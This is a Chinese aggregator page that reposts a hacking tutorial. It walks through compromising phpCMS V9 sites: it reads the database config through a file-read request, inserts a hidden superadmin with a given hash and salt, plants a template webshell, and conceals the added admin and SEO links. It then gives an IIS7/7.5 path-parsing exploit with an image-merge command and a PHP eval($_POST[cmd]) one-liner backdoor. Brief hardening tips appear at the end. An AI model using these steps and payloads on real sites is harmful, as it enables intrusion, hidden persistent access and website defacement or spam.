iis7.0解析漏洞 php用啥软件检测

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了iis7.0解析漏洞 php用啥软件检测相关的知识,希望对你有一定的参考价值。

参考技术A 本文利用了phpCMS V9的两个漏洞,一个是读取任意文件漏洞,另一个是模版运行php脚本漏洞。使用到的工具:Navicat for mysql/IE浏览器(建议使用代理)/湛蓝v9代码包(包含文中使用到的所有文件、代码和木马)

1、放置data.txt以备在目标站点读取并在目标站点生成PHP木马脚本使用。

例如将data.txt放置在yun.baidu.com/j0192/data.txt

2、通过v9漏洞获取配置信息(请参阅:phpcms V9最新读取站点任意文件漏洞)。

/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

3、通过v9系统漏洞获取到的数据库信息远程登陆目标站点数据库,在v9_admin和v9_sso_admin表中添加账号

username字段:admn
password字段:10203d4623c1957d041818196ff9822a
encrypt 字段:bGV22e
issuper 字段: 1

4、通过数据库添加管理员账号后使用以下用户名密码在后台登陆,然后修改当前用户密码。

用户名:admn
密码:123456

5、ctrl+a复制write.php全部内容粘贴进v9默认模版下的footer.html保存,然后点击footer.html的可视化运行该模版中的脚本,到此时就完成在目标站点生成木马脚本。

6、打开ifeng.com/caches/caches_template/default/wap/data.class.php

用户名:admin
密码:admin

7、隐藏新增加的管理员。

通过木马脚本上传替换/phpcms/modules/admin/admin_manage.php(默认匹配%admn%),然后登陆目标站点后台查看管理员列表是否还有用户名为admn的超级管理员,如果没有则表明我们完成了新加管理员的隐藏。

8、隐藏新增加的关联链接

通过木马脚本上传替换/phpcms/modules/admin/keylink.php((默认匹配%skyhome%))

9、将目标网站的漏洞修复,以防其他黑客入侵。

通过木马脚本上传替换/phpcms/modules/search/index.php

防黑参考:

1、关闭数据库远程访问。
2、静态文件及附件等文件目录禁止执行权限。
3、脚本文件目录禁止写权限。
4、系统后台等重要目录限制IP访问。
5、及时关注开源系统官方补丁升级和乌云、sebug等漏洞发布平台,修复系统漏洞。

IIS7和IIS7.5解析漏洞

IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。

 

常用利用方法:将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾

 

e.g. copy xx.jpg/b + yy.txt/a xy.jpg

######################################

/b 即二进制[binary]模式

/a 即ascii模式 xx.jpg正常图片文件

 

yy.txt 内容 <?PHPfputs(fopen(\'shell.php\',\'w\'),\'<?php eval($_POST[cmd])?>\');?>

意思为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件

 

######################################

找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。

然后就在图片目录下生成一句话木马 shell.php 密码 cmd

 

注意:

该解析漏洞利用需两个条件:

1.        php.ini里cgi.fix_pathinfo=1(默认为1)

 

2.        在”Handler Mapping”中取消勾选以下内容:

 

解决方案:

1.      配置cgi.pathinfo(php.ini中)为0并重启php-cgi程序

  

2.      在”Handler Mapping”勾选php-cgi.exe程序的”Invoke handler only if request is mapped to”

 

3.      重新配置iis,使用ISAPI的方式(注意:PHP5.3.1已经不支持ISAPI方式)。


原文链接:https://blog.csdn.net/sap910131/article/details/37379177

以上是关于iis7.0解析漏洞 php用啥软件检测的主要内容,如果未能解决你的问题,请参考以下文章

用啥软件可以测到U盘的读写速度

腾讯视频在线批量解析下载用啥软件好?

文件上传姿势整理(附实战)

用啥软件写起重机检验员检测报告

CPU超频后用啥软件测试稳定性?

做PHP开发一般都用啥软件?